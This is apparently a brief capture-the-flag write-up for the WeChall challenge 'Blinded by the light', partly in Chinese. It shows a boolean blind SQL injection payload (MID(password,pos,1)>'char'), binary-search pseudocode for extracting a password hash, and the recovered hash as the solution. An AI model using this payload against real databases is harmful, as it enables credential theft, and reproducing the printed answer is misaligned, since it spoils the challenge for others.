WeChall - Blinded by the light

Posted on In Views: Disqus:

Challenge

Boolean blind SQL injection. Extract a 32-character hex hash from the database using boolean-based blind techniques.

Solution

源码审计确认 boolean blind SQLi。hash 是 32 位十六进制字符(0-9, A-F),共 16 种可能。每位用 4 次二分查询(16→8→4→2→1),32 位共 128 次。

核心注入 payload:

1
MID(password,{pos},1)>'{char}'

根据页面返回 True/False 判断字符范围,二分搜索确定每个字符。

1
2
3
4
5
6
7
8
9
10
for pos in range(1, 33):
    lo, hi = 0, 15
    while lo < hi:
        mid = (lo + hi) // 2
        # inject: MID(password,N,1) > HEX[mid]
        if response_true:
            lo = mid + 1
        else:
            hi = mid
    result += alphabet[lo]
9DF0D5E04DC51E5A17A667DBD1C9EBEA